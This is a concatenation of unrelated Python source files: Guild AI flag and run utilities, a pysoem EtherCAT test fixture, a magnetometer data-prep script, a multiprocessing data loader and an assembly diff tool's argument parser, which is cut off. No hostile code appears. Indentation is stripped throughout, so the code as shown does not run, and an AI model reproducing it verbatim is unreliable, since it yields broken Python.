def _flagdef_arg_skip(flagdef):
if flagdef.arg_skip is not None:
return flagdef.arg_skip
return flagdef.opdef.default_flag_arg_skip
###################################################################
# Flag vals for opdef
###################################################################
def flag_vals_for_opdef(opdef, user_flag_vals=None, force=False):
flag_vals = dict(user_flag_vals)
_apply_default_flag_vals(opdef.flags, flag_vals)
_apply_coerce_flag_vals(opdef.flags, force, flag_vals)
resource_flagdefs = _resource_flagdefs(opdef, flag_vals)
_apply_coerce_flag_vals(resource_flagdefs, force, flag_vals)
_apply_default_flag_vals(resource_flagdefs, flag_vals)
all_flagdefs = opdef.flags + resource_flagdefs
if not force:
_check_no_such_flags(flag_vals, all_flagdefs)
_check_flag_vals(flag_vals, all_flagdefs)
_check_required_flags(flag_vals, all_flagdefs)
_apply_choice_vals(opdef.flags, user_flag_vals, flag_vals)
return flag_vals, resource_flagdefs
def _apply_coerce_flag_vals(flagdefs, force, vals):
flagdef_lookup = {flagdef.name: flagdef for flagdef in flagdefs}
for name, val in vals.items():
try:
coerced = _coerced_flag_value(name, val, flagdef_lookup)
except InvalidFlagValue:
if not force:
raise
else:
vals[name] = coerced
def _coerced_flag_value(name, val, flagdefs):
flagdef = flagdefs.get(name)
if not flagdef:
return val
try:
return coerce_flag_value(val, flagdef)
except (ValueError, TypeError) as e:
raise InvalidFlagValue(val, flagdef, str(e))
def coerce_flag_value(val, flagdef):
"""Coerces a flag value based on flagdef settings."""
if (
val is None
or not flagdef
or not flagdef.type
or flagdef.type == "auto"
or flag_util.is_flag_function(val)
):
return val
if isinstance(val, list):
return [coerce_flag_value(x, flagdef) for x in val]
elif flagdef.type == "string":
return _try_coerce_flag_val(val, str, flagdef)
elif flagdef.type == "int":
if isinstance(val, float):
raise ValueError("invalid value for type 'int'")
return _try_coerce_flag_val(val, int, flagdef)
elif flagdef.type == "float":
return _try_coerce_flag_val(val, float, flagdef)
elif flagdef.type == "boolean":
return _try_coerce_flag_val(val, bool, flagdef)
elif flagdef.type == "number":
if isinstance(val, (float, int)):
return val
return _try_coerce_flag_val(val, (int, float), flagdef)
elif flagdef.type in ("path", "existing-path"):
return _resolve_rel_path(val)
else:
log.warning(
"unknown flag type '%s' for %s - cannot coerce", flagdef.type, flagdef.name
)
return val
def _try_coerce_flag_val(val, funs, flagdef):
if not isinstance(funs, tuple):
funs = (funs,)
for f in funs:
try:
return f(val)
except ValueError as e:
log.debug("value error applying %s to %r: %s", f, val, e)
raise ValueError("invalid value for type '%s'" % flagdef.type)
def _resolve_rel_path(val):
val = os.path.expanduser(val)
if val and not os.path.isabs(val):
return os.path.abspath(val)
return val
def _resource_flagdefs(opdef, flag_vals):
return list(_iter_resource_flagdefs(opdef, flag_vals))
def _iter_resource_flagdefs(opdef, flag_vals):
for dep in opdef.dependencies:
try:
resdef, _location = op_dep.resource_def(dep, flag_vals)
except op_dep.OpDependencyError:
pass
else:
if resdef.flag_name:
yield _ResourceFlagDefProxy(resdef.flag_name, opdef)
else:
op_name = _required_operation_name(resdef)
if op_name:
yield _ResourceFlagDefProxy(op_name, opdef)
def _required_operation_name(resdef):
for source in resdef.sources:
if source.uri.startswith("operation:"):
return resdef.name
return None
def _ResourceFlagDefProxy(name, opdef):
data = {
"arg-skip": True,
"type": "string",
"null-label": "unspecified",
}
return guildfile.FlagDef(name, data, opdef)
def _check_no_such_flags(flag_vals, flagdefs):
flagdef_names = set([flagdef.name for flagdef in flagdefs])
for name in flag_vals:
if name not in flagdef_names:
raise NoSuchFlagError(name)
def _check_flag_vals(vals, flagdefs):
for flag in flagdefs:
val = vals.get(flag.name)
_check_flag_val(val, flag)
def _check_flag_val(val, flag):
if isinstance(val, list):
for x in val:
_check_flag_val(x, flag)
elif flag_util.is_flag_function(val):
pass
else:
_check_flag_choice(val, flag)
_check_flag_type(val, flag)
_check_flag_range(val, flag)
def _check_flag_choice(val, flag):
if not val or flag.allow_other or not flag.choices:
return
for choice in flag.choices:
if choice.alias and val == choice.alias:
return
if choice.value == val:
return
raise InvalidFlagChoice(val, flag)
def _check_flag_type(val, flag):
if flag.type == "existing-path":
if val and not os.path.exists(val):
raise InvalidFlagValue(val, flag, "%s does not exist" % val)
def _check_flag_range(val, flag):
if val is None:
return
if flag.min is not None and val < flag.min:
raise InvalidFlagValue(val, flag, "out of range (less than min %s)" % flag.min)
if flag.max is not None and val > flag.max:
raise InvalidFlagValue(
val, flag, "out of range (greater than max %s)" % flag.max
)
def _apply_choice_vals(flagdefs, user_vals, target_vals):
for flagdef in flagdefs:
if not flagdef.choices:
continue
flag_val = target_vals.get(flagdef.name)
if flag_val is None:
continue
for choice in flagdef.choices:
if (choice.alias or choice.value) != flag_val:
continue
if choice.alias:
target_vals[flagdef.name] = choice.value
if choice.flags:
_apply_choice_flags(choice.flags, user_vals, target_vals)
def _apply_choice_flags(choice_flags, user_vals, target_vals):
for flag_name, flag_val in choice_flags.items():
if user_vals.get(flag_name) is None:
target_vals[flag_name] = flag_val
def _check_required_flags(vals, flagdefs):
missing = _missing_flags(vals, flagdefs)
if missing:
raise MissingRequiredFlags(missing)
def _missing_flags(vals, flagdefs):
return [
flag
for flag in flagdefs
if flag.required and _flag_missing(vals.get(flag.name))
]
def _flag_missing(val):
if val is None or val == "":
return True
return False
def _apply_default_flag_vals(flagdefs, flag_vals):
"""Applies default values to flag_vals.
Skips flag values that are already defined in flag_vals.
"""
for flagdef in flagdefs:
if flagdef.name not in flag_vals:
flag_vals[flagdef.name] = flagdef.default
def flag_assigns(flags, skip_none=False):
return [
flag_assign(name, val)
for name, val in sorted(flags.items())
if not skip_none or val is not None
]
def flag_assign(name, val):
return "%s=%s" % (name, flag_util.format_flag(val))
def parse_flag_assigns(args, opdef=None):
flag_types = _flag_types_for_opdef(opdef) if opdef else None
return dict([parse_flag_arg(os.path.expanduser(arg), flag_types) for arg in args])
def _flag_types_for_opdef(opdef):
return {flagdef.name: flagdef.type for flagdef in opdef.flags}
def parse_flag_arg(arg, flag_types=None):
parts = arg.split("=", 1)
if len(parts) == 1:
raise ArgValueError(arg)
else:
flag_type = flag_types.get(parts[0]) if flag_types else None
return parts[0], flag_util.decode_flag_val(parts[1], flag_type)
def args_to_flags(args):
"""Returns `flags, other_args` for `args`.
`other_args` is a list of args that cannot be converted to flag
values.
If args contains `--` then all args before the last occuring `--`
are included in `other_args`.
Uses `util.decode_yaml()` to decode flag arg values.
"""
flags = {}
flag_args, other_args = split_args_for_flags(args)
name = None
for arg in flag_args:
if arg[:2] == "--":
name = arg[2:]
flags[name] = True
elif arg[:1] == "-":
val = util.decode_yaml(arg)
if isinstance(val, (int, float)):
flags[name] = val
elif len(arg) == 2:
name = arg[1]
flags[name] = True
elif len(arg) > 2:
name = None
flags[arg[1]] = arg[2:]
elif name is not None:
flags[name] = util.decode_yaml(arg)
name = None
else:
other_args.append(arg)
return flags, other_args
def split_args_for_flags(args):
"""Returns `split_args, other_args` for `args`.
Split occurs using the last occurrence of `--` in `args`.
If `arg` does not contain `--` returns `args, []`.
"""
for i in range(len(args) - 1, -1, -1):
if args[i] == "--":
return args[i + 1 :], args[:i]
return args, []
def global_dest(global_name, flags):
dest = cur = {}
for name in global_name.split("."):
cur = cur.setdefault(name, {})
cur.update(flags)
return dest
def flags_desc(flags, truncate_floats=False, delim=", "):
formatted = flag_util.flag_assigns(flags, truncate_floats)
return delim.join(formatted)
###################################################################
# Op deps IO
###################################################################
def op_deps_as_data(deps):
return [_op_dep_as_data(dep) for dep in deps or []]
def _op_dep_as_data(dep):
data = _resdef_data(dep.resdef)
if dep.res_location:
data["location"] = dep.res_location
if dep.config:
data["config"] = dep.config
return data
def _resdef_data(resdef):
data = dict(resdef._data)
data["name"] = resdef.name
return data
def op_deps_for_data(data):
return [_op_dep_for_data(item_data) for item_data in data or []]
def _op_dep_for_data(data):
resdef = _resdef_from_data(data)
location = data.get("location")
config = data.get("config")
return op_dep.OpDependency(resdef, location, config)
def _resdef_from_data(data):
name = data.get("name")
return guildfile.ResourceDef(name, data, _ModelDefProxy())
class _ModelDefProxy(object):
name = ""
guildfile = None
parents = []
###################################################################
# Trials support
###################################################################
def trials_for_batch_files(files):
trials = []
for path in files:
trials.extend(_read_trials(path))
return trials
def _read_trials(path):
ext = os.path.splitext(path)[1].lower()
if ext in (".json", ".yml", ".yaml"):
return _yaml_trials(path)
elif ext in ("", ".csv"):
return _csv_trials(path)
else:
raise BatchFileError(path, "unsupported extension")
def _yaml_trials(path):
try:
data = yaml.safe_load(open(path, "r"))
except Exception as e:
raise BatchFileError(path, str(e))
else:
return _coerce_trials_data(data, path)
def _coerce_trials_data(data, path):
if not isinstance(data, list):
if not isinstance(data, dict):
raise BatchFileError(
path,
"invalid data type for trials: expected list or dict"
", got %s" % type(data).__name__,
)
data = [data]
for item in data:
if not isinstance(item, dict):
raise BatchFileError(
path, "invalid data type for trial %r: expected dict" % item
)
return data
def _csv_trials(path):
reader = csv.reader(open(path, "r"))
try:
flag_names = next(reader)
except StopIteration:
return []
else:
return [dict(zip(flag_names, _flag_vals(row))) for row in reader]
def _flag_vals(row):
return [flag_util.decode_flag_val(s) for s in row]
###################################################################
# Restart support
###################################################################
def restart_needed(run, flags):
return run.status in RESTART_NEEDED_STATUS or run.get("flags") != flags
def run_params_for_restart(run, user_specified_params=None):
"""Returns params for use in run command for a restart of run.
The set of applicable params in the run "run_params" attribute are
considered. If user_specified_params contains a non-default value
(i.e. the user has indicated she wants to use a specific value)
that param will not be included in the result. If
user_specified_params is None (default) then all applicable params
for a restart that are defined in run are returned.
"""
# Note about applicable run params:
#
# A limited number of params could possibly apply to args - those
# are listed here. This list has to be maintained as new args are
# added to the run command. Params must be included where the user
# would reasonably assume applicability and never in cases where
# the use of the parameter would be clearly surprising to the user
# (e.g. reusing the 'yes' param, which would alter the expected
# behavior of the command on a restart).
#
# Params that are saved as run attrs or otherwise available under
# the run guild path (e.g. opspec, label, flags) should NOT be
# returned in this value in the interest of elimiting redundancy
# and potential mismtach bugs. Anyone needing those values MUST
# read them via run attrs or applicable run interface
# (e.g. opref in the case of opsec).
#
applicable_run_params = [
"force_flags",
"gpus",
"max_trials",
"maximize",
"minimize",
"no_gpus",
"opt_flags",
"optimizer",
"random_seed",
]
from guild.commands.run import run as run_cmd
run_params = run.get("run_params", {})
if not isinstance(run_params, dict):
return
baseline_params = run_cmd.make_context("", []).params
result = {}
for name in run_params:
val = _coerce_run_param(name, run_params[name])
if name not in applicable_run_params:
continue
if user_specified_params is None:
result[name] = val
continue
try:
user_specified_val = user_specified_params[name]
except KeyError:
result[name] = val
continue
if user_specified_val != baseline_params[name]:
continue
result[name] = val
return result
def _coerce_run_param(name, val):
"""Ensures that named param is valid for the run command."""
if name == "flags":
return tuple(val)
return val
###################################################################
# Wait for proc
###################################################################
def wait_for_proc(p, stop_after_min, poll_interval=None, kill_delay=None):
poll_interval = poll_interval or DEFAULT_PROC_POLL_INTERVAL
kill_delay = kill_delay or DEFAULT_PROC_KILL_DELAY
started = time.time()
stop_at = time.time() + stop_after_min * 60
while time.time() < stop_at:
returncode = p.poll()
if returncode is not None:
return returncode
time.sleep(poll_interval)
elapsed = (time.time() - started) / 60
log.info("Stopping process early (pid %i) - %.1f minute(s) elapsed", p.pid, elapsed)
return _terminate(p, poll_interval, kill_delay)
def _terminate(p, poll_interval, kill_delay):
kill_at = time.time() + kill_delay
p.terminate()
while p.poll() is None and time.time() < kill_at:
time.sleep(poll_interval)
if p.poll() is None:
log.warning("Process did not terminate (pid %i), killing", p.pid)
p.kill()
time.sleep(poll_interval)
returncode = p.poll()
if returncode not in (0, -15):
raise ProcessError("Process did not terminate gracefully (pid %i)" % p.pid)
return returncode
###################################################################
# Utils
###################################################################
def split_batch_files(flag_args):
batch_files = []
rest = []
for arg in flag_args:
if arg[:1] == "@":
batch_files.append(arg[1:])
else:
rest.append(arg)
return batch_files, rest
def find_matching_runs(opref, flag_vals, include_pending=False):
return [
run
for run in var.runs()
if is_matching_run(run, opref, flag_vals, include_pending)
]
def is_matching_run(run, opref, flag_vals, include_pending=False):
return (
run.opref == opref
and run.get("flags") == flag_vals
and (include_pending or run.status != "pending")
)
def op_flag_encoder(flag_encoder):
if not flag_encoder:
return None
parts = flag_encoder.split(":")
if len(parts) != 2:
log.warning("invalid flag decoder %r - must be MODULE:FUNCTION", flag_encoder)
return None
mod_name, fun_name = parts
try:
mod = importlib.import_module(mod_name)
except Exception as e:
if log.getEffectiveLevel() <= logging.DEBUG:
log.exception("importing %s", mod_name)
else:
log.warning("cannot load flag decoder %r: %s", flag_encoder, e)
return None
fun = getattr(mod, fun_name, None)
if fun is None:
log.warning(
"cannot load flag decoder %r: no such attribute in %s",
flag_encoder,
mod_name,
)
return None
return fun
def write_proc_lock(pid, run):
with open(run.guild_path("LOCK"), "w") as f:
f.write(str(pid))
def delete_proc_lock(run):
try:
os.remove(run.guild_path("LOCK"))
except OSError:
pass
def init_logging():
if os.getenv("LOG_INIT_SKIP") == "1":
return
level = int(os.getenv("LOG_LEVEL", logging.WARN))
format = os.getenv("LOG_FORMAT", "%(levelname)s: [%(name)s] %(message)s")
loglib.init_logging(level, {"_": format})
|
conftest.py
|
import time
import collections
import threading
import pytest
import pysoem
def pytest_addoption(parser):
parser.addoption('--ifname', action='store')
class PySoemTestEnvironment:
"""Setup a basic pysoem test fixture that is needed for most of tests"""
BECKHOFF_VENDOR_ID = 0x0002
EK1100_PRODUCT_CODE = 0x044c2c52
EL3002_PRODUCT_CODE = 0x0bba3052
EL1259_PRODUCT_CODE = 0x04eb3052
def __init__(self, ifname):
self._ifname = ifname
self._master = pysoem.Master()
self._master.in_op = False
self._master.do_check_state = False
self._proc_thread_handle = None
self._check_thread_handle = None
self._pd_thread_stop_event = threading.Event()
self._ch_thread_stop_event = threading.Event()
self._actual_wkc = 0
self.SlaveSet = collections.namedtuple('SlaveSet', 'name vendor_id product_code config_func')
self.el3002_config_func = None
self.el1259_config_func = None
self._expected_slave_layout = None
def setup(self):
self._expected_slave_layout = {
0: self.SlaveSet('XMC43-Test-Device', 0, 0x12783456, None),
1: self.SlaveSet('EK1100', self.BECKHOFF_VENDOR_ID, self.EK1100_PRODUCT_CODE, None),
2: self.SlaveSet('EL3002', self.BECKHOFF_VENDOR_ID, self.EL3002_PRODUCT_CODE, self.el3002_config_func),
3: self.SlaveSet('EL1259', self.BECKHOFF_VENDOR_ID, self.EL1259_PRODUCT_CODE, self.el1259_config_func),
}
self._master.open(self._ifname)
assert self._master.config_init(False) > 0
self._master.config_dc()
for i, slave in enumerate(self._master.slaves):
assert slave.man == self._expected_slave_layout[i].vendor_id
assert slave.id == self._expected_slave_layout[i].product_code
slave.config_func = self._expected_slave_layout[i].config_func
slave.is_lost = False
self._master.config_map()
assert self._master.state_check(pysoem.SAFEOP_STATE) == pysoem.SAFEOP_STATE
def go_to_op_state(self):
self._master.state = pysoem.OP_STATE
self._proc_thread_handle = threading.Thread(target=self._processdata_thread)
self._proc_thread_handle.start()
self._check_thread_handle = threading.Thread(target=self._check_thread)
self._check_thread_handle.start()
self._master.write_state()
for _ in range(400):
self._master.state_check(pysoem.OP_STATE, 50000)
if self._master.state == pysoem.OP_STATE:
all_slaves_reached_op_state = True
break
assert 'all_slaves_reached_op_state' in locals(), 'could not reach OP state'
self._master.in_op = True
def teardown(self):
self._pd_thread_stop_event.set()
self._ch_thread_stop_event.set()
if self._proc_thread_handle:
self._proc_thread_handle.join()
if self._check_thread_handle:
self._check_thread_handle.join()
self._master.state = pysoem.INIT_STATE
self._master.write_state()
self._master.close()
def get_master(self):
return self._master
def get_slaves(self):
return self._master.slaves
def get_slave_for_foe_testing(self):
return self._master.slaves[0] # the XMC device
def get_slave_without_foe_support(self):
return self._master.slaves[2] # the EL3002
def _processdata_thread(self):
while not self._pd_thread_stop_event.is_set():
self._master.send_processdata()
self._actual_wkc = self._master.receive_processdata(10000)
time.sleep(0.01)
@staticmethod
def _check_slave(slave, pos):
if slave.state == (pysoem.SAFEOP_STATE + pysoem.STATE_ERROR):
print(
'ERROR : slave {} is in SAFE_OP + ERROR, attempting ack.'.format(pos))
slave.state = pysoem.SAFEOP_STATE + pysoem.STATE_ACK
slave.write_state()
elif slave.state == pysoem.SAFEOP_STATE:
print(
'WARNING : slave {} is in SAFE_OP, try change to OPERATIONAL.'.format(pos))
slave.state = pysoem.OP_STATE
slave.write_state()
elif slave.state > pysoem.NONE_STATE:
if slave.reconfig():
slave.is_lost = False
print('MESSAGE : slave {} reconfigured'.format(pos))
elif not slave.is_lost:
slave.state_check(pysoem.OP_STATE)
if slave.state == pysoem.NONE_STATE:
slave.is_lost = True
print('ERROR : slave {} lost'.format(pos))
if slave.is_lost:
if slave.state == pysoem.NONE_STATE:
if slave.recover():
slave.is_lost = False
print(
'MESSAGE : slave {} recovered'.format(pos))
else:
slave.is_lost = False
print('MESSAGE : slave {} found'.format(pos))
def _check_thread(self):
while not self._ch_thread_stop_event.is_set():
if self._master.in_op and ((self._actual_wkc < self._master.expected_wkc) or self._master.do_check_state):
self._master.do_check_state = False
self._master.read_state()
for i, slave in enumerate(self._master.slaves):
if slave.state != pysoem.OP_STATE:
self._master.do_check_state = True
self._check_slave(slave, i)
if not self._master.do_check_state:
print('OK : all slaves resumed OPERATIONAL.')
time.sleep(0.01)
@pytest.fixture
def pysoem_environment(request):
env = PySoemTestEnvironment(request.config.getoption('--ifname'))
yield env
env.teardown()
|
main.py
|
#!/usr/bin/env python
# wipflag{todo}
from threading import Thread
from game import Game
from bytekeeper import ByteKeeper
from broker import Broker # todo
class Main:
def __init__(self):
print('starting main...\n')
self.running = True
self.bytekeeper = ByteKeeper()
self.game = Game(self, self.bytekeeper)
# self.broker = Broker(self, self.bytekeeper)
self.gamethread = Thread(target=self.game.run)
# self.brokerthread = Thread(target=self.broker.run)
self.gamethread.start()
# self.brokerthread.start()
if __name__ == "__main__":
main = Main()
|
ServerDataPrep.py
|
import numpy as np
import pandas as pd
import spacepy.datamodel as dm
from spacepy import pycdf
import os
import pickleshare as ps
from multiprocessing import Process
db_pathway = '~/Database'
db = ps.PickleShareDB(db_pathway)
def data_in(f_name, LOCATION):
try:
data = dm.fromCDF(f_name).copy()
except:
try:
data = pycdf.CDF(f_name)
except:
print('Issue with:', f_name)
return pd.DataFrame(), False
time = data['thg_mag_' + LOCATION + '_time'].copy()
D = data['thg_mag_' + LOCATION].copy()
df = pd.DataFrame(D, index=time)
df.index = pd.to_datetime(df.index, unit='s')
df = df.resample('1min').mean()
return df, True
def get_data(LOCATION, YEAR):
pathway = '/Data/Magnetometers/' + LOCATION + '/' + str(YEAR) + '/'
fname = 'Corrupt/' + LOCATION + '/' + str(YEAR) + '/bad_files'
db[fname] = []
try:
file_list = sorted(os.listdir(pathway))
year_present = True
except:
year_present = False
print(str(YEAR) + '---' + LOCATION, 'not in database')
if year_present and (len(file_list) > 1):
df_full, G = data_in(pathway + file_list[0], LOCATION)
for file in file_list[1:]:
df, G = data_in(pathway + file, LOCATION)
if G:
df_full = pd.concat((df_full, df), axis=0)
fname = '/Data/HDF/' + str(YEAR) + '/' + LOCATION + '.hdf'
print(fname, YEAR, 'Complete')
df_full = df_full.drop_duplicates()
df_dbdt = df_full.diff()**2
df_dbdt = np.log(df_dbdt.sum(axis=1)**(1/2))
df_dbdt = df_dbdt.replace(np.inf, np.nan).replace(-np.inf, np.nan).dropna()
df_dbdt = df_dbdt[str(YEAR)].resample('5min', label='left').mean()
df_dbdt.to_hdf(fname, key='Y' + str(YEAR), mode='w', format='f')
else:
print('Exiting....')
return
def step1(LOCATION):
procs = []
for YEAR in range(2007, 2018):
proc = Process(target=get_data, name=LOCATION + str(YEAR),
args=(LOCATION, YEAR))
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
return
def main():
pathway = '/Data/Magnetometers/'
stations = sorted(os.listdir(pathway))[70:]
procs = []
for j in range(len(stations)):
LOCATION = stations[j]
if LOCATION != 'han':
proc = Process(target=step1, name=LOCATION,
args=(LOCATION,))
procs.append(proc)
proc.start()
if (j + 1) % 15 == 0:
print(procs)
for proc in procs:
proc.join()
print(proc)
procs=[]
for proc in procs:
proc.join()
return
def merge_data(YEAR):
pathway = '/Data/HDF/' + str(YEAR) + '/'
try:
file_list = sorted(os.listdir(pathway))
year_present = True
except:
year_present = False
print(str(YEAR) + '--- not in database')
start = str(YEAR) + '-01-01-00:00:00'
end = str(YEAR) + '-12-31-23:55:00'
tindex = pd.date_range(start=start, end=end, freq='5min')
df = pd.DataFrame(index=tindex)
if year_present and (len(file_list) > 1):
name = file_list[0].split('.')[0]
df[name] = pd.read_hdf(pathway + file_list[0])
for file in file_list:
name = file.split('.')[0]
df[name] = pd.read_hdf(pathway + file)
fname = '/Data/HDF_Full/' + str(YEAR) + '.hdf'
df.to_hdf(fname, key='Y' + str(YEAR), mode='w', format='f')
print(YEAR, df.shape)
else:
print('Exiting....')
return
#p = np.asarray([np.asarray([x for x in v[i:i+10]]) for i in range(len(v[:30])-1)])
#p = np.asarray([np.asarray([x for x in df.iloc[i:i+10].values]) for i in range(len(v[:50])-10)])
#p = p.swapaxes(1,2)
#main()
def find_missing():
stations = sorted(os.listdir('/Data/Magnetometers/'))
procs = []
for YEAR in range(2007,2018):
for station in stations:
try:
file_list = sorted(os.listdir('/Data/Magnetometers/' + station + '/' + str(YEAR)))
if len(file_list) > 1:
year_present = True
else:
year_present = False
except:
year_present = False
if year_present:
n_file_list = sorted(os.listdir('/Data/HDF/' + str(YEAR)))
if station + '.hdf' not in n_file_list:
print(station, YEAR)
proc = Process(target=get_data, name=station + str(YEAR),
args=(station, YEAR))
procs.append(proc)
proc.start()
if len(procs) == 15:
print(procs)
for proc in procs:
proc.join()
print(proc)
procs=[]
if len(procs) > 2:
for proc in procs:
proc.join()
return
#find_missing()
# merge_data(YEAR)
#fname = '/Data/HDF_Full/'
#files = sorted(os.listdir(fname))
#
#for file in files:
# df = pd.read_hdf(fname + file)
# print(df.shape)
|
dataloader.py
|
import numpy as np
import multiprocessing
import queue
from itertools import cycle
def default_collate(batch):
if isinstance(batch[0], np.ndarray):
return np.stack(batch)
if isinstance(batch[0], (int, float)):
return np.array(batch)
if isinstance(batch[0], (list, tuple)):
return tuple(default_collate(var) for var in zip(*batch))
class NaiveDataLoader:
def __init__(self, dataset, batch_size=64, collate_fn=default_collate):
self.index = 0
self.dataset = dataset
self.batch_size = batch_size
self.collate_fn = collate_fn
def __iter__(self):
self.index = 0
return self
def __next__(self):
if self.index >= len(self.dataset):
raise StopIteration
batch_size = min(len(self.dataset) - self.index, self.batch_size)
return self.collate_fn([self.get() for _ in range(batch_size)])
def get(self):
item = self.dataset[self.index]
self.index += 1
return item
def worker_fn(dataset, index_queue, output_queue):
while True:
# Worker function, simply reads indices from index_queue, and adds the
# dataset element to the output_queue
try:
index = index_queue.get(timeout=0)
except queue.Empty:
continue
if index is None:
break
output_queue.put((index, dataset[index]))
class DataLoader(NaiveDataLoader):
def __init__(
self,
dataset,
batch_size=64,
num_workers=1,
prefetch_batches=2,
collate_fn=default_collate,
):
super().__init__(dataset, batch_size, collate_fn)
self.num_workers = num_workers
self.prefetch_batches = prefetch_batches
self.output_queue = multiprocessing.Queue()
self.index_queues = []
self.workers = []
self.worker_cycle = cycle(range(num_workers))
self.cache = {}
self.prefetch_index = 0
for _ in range(num_workers):
index_queue = multiprocessing.Queue()
worker = multiprocessing.Process(
target=worker_fn, args=(self.dataset, index_queue, self.output_queue)
)
worker.daemon = True
worker.start()
self.workers.append(worker)
self.index_queues.append(index_queue)
self.prefetch()
def prefetch(self):
while (
self.prefetch_index < len(self.dataset)
and self.prefetch_index
< self.index + 2 * self.num_workers * self.batch_size
):
# if the prefetch_index hasn't reached the end of the dataset
# and it is not 2 batches ahead, add indexes to the index queues
self.index_queues[next(self.worker_cycle)].put(self.prefetch_index)
self.prefetch_index += 1
def __iter__(self):
self.index = 0
self.cache = {}
self.prefetch_index = 0
self.prefetch()
return self
def get(self):
self.prefetch()
if self.index in self.cache:
item = self.cache[self.index]
del self.cache[self.index]
else:
while True:
try:
(index, data) = self.output_queue.get(timeout=0)
except queue.Empty: # output queue empty, keep trying
continue
if index == self.index: # found our item, ready to return
item = data
break
else: # item isn't the one we want, cache for later
self.cache[index] = data
self.index += 1
return item
def __del__(self):
try:
for i, w in enumerate(self.workers):
self.index_queues[i].put(None)
w.join(timeout=5.0)
for q in self.index_queues:
q.cancel_join_thread()
q.close()
self.output_queue.cancel_join_thread()
self.output_queue.close()
finally:
for w in self.workers:
if w.is_alive():
w.terminate()
|
diff.py
|
#!/usr/bin/env python3
# PYTHON_ARGCOMPLETE_OK
import argparse
import sys
from typing import (
Any,
Callable,
Dict,
Iterator,
List,
Match,
NoReturn,
Optional,
Pattern,
Set,
Tuple,
Type,
Union,
)
def fail(msg: str) -> NoReturn:
print(msg, file=sys.stderr)
sys.exit(1)
def static_assert_unreachable(x: NoReturn) -> NoReturn:
raise Exception("Unreachable! " + repr(x))
# ==== COMMAND-LINE ====
if __name__ == "__main__":
# Prefer to use diff_settings.py from the current working directory
sys.path.insert(0, ".")
try:
import diff_settings
except ModuleNotFoundError:
fail("Unable to find diff_settings.py in the same directory.")
sys.path.pop(0)
try:
import argcomplete
except ModuleNotFoundError:
argcomplete = None
parser = argparse.ArgumentParser(
description="Diff MIPS, PPC, AArch64, or ARM32 assembly."
)
start_argument = parser.add_argument(
"start",
help="Function name or address to start diffing from.",
)
if argcomplete:
def complete_symbol(
prefix: str, parsed_args: argparse.Namespace, **kwargs: object
) -> List[str]:
if not prefix or prefix.startswith("-"):
# skip reading the map file, which would
# result in a lot of useless completions
return []
config: Dict[str, Any] = {}
diff_settings.apply(config, parsed_args) # type: ignore
mapfile = config.get("mapfile")
if not mapfile:
return []
completes = []
with open(mapfile) as f:
data = f.read()
# assume symbols are prefixed by a space character
search = f" {prefix}"
pos = data.find(search)
while pos != -1:
# skip the space character in the search string
pos += 1
# assume symbols are suffixed by either a space
# character or a (unix-style) line return
spacePos = data.find(" ", pos)
lineReturnPos = data.find("\n", pos)
if lineReturnPos == -1:
endPos = spacePos
elif spacePos == -1:
endPos = lineReturnPos
else:
endPos = min(spacePos, lineReturnPos)
if endPos == -1:
match = data[pos:]
pos = -1
else:
match = data[pos:endPos]
pos = data.find(search, endPos)
completes.append(match)
return completes
setattr(start_argument, "completer", complete_symbol)
parser.add_argument(
"end",
nargs="?",
help="Address to end diff at.",
)
parser.add_argument(
"-o",
dest="diff_obj",
action="store_true",
help="""Diff .o files rather than a whole binary. This makes it possible to
see symbol names. (Recommended)""",
)
parser.add_argument(
"-f",
"--objfile",
dest="objfile",
type=str,
help="""File path for an object file being diffed. When used
the map file isn't searched for the function given. Useful for dynamically
linked libraries."""
)
parser.add_argument(
"-e",
"--elf",
dest="diff_elf_symbol",
metavar="SYMBOL",
help="""Diff a given function in two ELFs, one being stripped and the other
one non-stripped. Requires objdump from binutils 2.33+.""",
)
parser.add_argument(
"-c",
"--source",
dest="show_source",
action="store_true",
help="Show source code (if possible). Only works with -o or -e.",
)
parser.add_argument(
"-C",
"--source-old-binutils",
dest="source_old_binutils",
action="store_true",
help="""Tweak --source handling to make it work with binutils < 2.33.
Implies --source.""",
)
parser.add_argument(
"-j",
"--section",
dest="diff_section",
default=".text",
metavar="SECTION",
help="Diff restricted to a given output section.",
)
parser.add_argument(
"-L",
"--line-numbers",
dest="show_line_numbers",
action="store_const",
const=True,
help="""Show source line numbers in output, when available. May be enabled by
default depending on diff_settings.py.""",
)
parser.add_argument(
"--no-line-numbers",
dest="show_line_numbers",
action="store_const",
const=False,
help="Hide source line numbers in output.",
)
parser.add_argument(
"--inlines",
dest="inlines",
action="store_true",
help="Show inline function calls (if possible). Only works with -o or -e.",
)
parser.add_argument(
"--base-asm",
dest="base_asm",
metavar="FILE",
help="Read assembly from given file instead of configured base img.",
)
parser.add_argument(
"--write-asm",
dest="write_asm",
metavar="FILE",
help="Write the current assembly output to file, e.g. for use with --base-asm.",
)
parser.add_argument(
"-m",
"--make",
dest="make",
action="store_true",
help="Automatically run 'make' on the .o file or binary before diffing.",
)
parser.add_argument(
"-l",
"--skip-lines",
dest="skip_lines",
metavar="LINES",
type=int,
default=0,
help="Skip the first LINES lines of output.",
)
parser.add_argument(
"-s",
"--stop-jr-ra",
dest="stop_jrra",
action="store_true",
help="""Stop disassembling at the first 'jr ra'. Some functions have
multiple return points, so use with care!""",
)
parser.add_argument(
"-i",
"--ignore-large-imms",
dest="ignore_large_imms",
action="store_true",
help="Pretend all large enough immediates are the same.",
)
parser.add_argument(
"-I",
"--ignore-addr-diffs",
dest="ignore_addr_diffs",
action="store_true",
help="Ignore address differences. Currently only affects AArch64 and ARM32.",
)
parser.add_argument(
"-B",
"--no-show-branches",
dest="show_branches",
action="store_false",
help="Don't visualize branches/branch targets.",
)
parser.add_argument(
"-S",
"--base-shift",
dest="base_shift",
metavar="N",
type=str,
default="0",
help="""Diff position N in our img against position N + shift in the base img.
Arithmetic is allowed, so e.g. |-S "0x1234 - 0x4321"| is a reasonable
flag to pass if it is known that position 0x1234 in the base img syncs
up with position 0x4321 in our img. Not supported together with -o.""",
)
parser.add_argument(
"-w",
"--watch",
dest="watch",
action="store_true",
help="""Automatically update when source/object files change.
Recommended in combination with -m.""",
)
parser.add_argument(
"-3",
"--threeway=prev",
dest="threeway",
action="store_const",
const="prev",
help="""Show a three-way diff between target asm, current asm, and asm
prior to -w rebuild. Requires -w.""",
)
parser.add_argument(
"-b",
"--threeway=base",
dest="threeway",
action="store_const",
const="base",
help="""Show a three-way diff between target asm, current asm, and asm
when diff.py was started. Requires -w.""",
)
parser.add_argument(
"--width",
dest="column_width",
metavar="COLS",
type=int,
default=50,
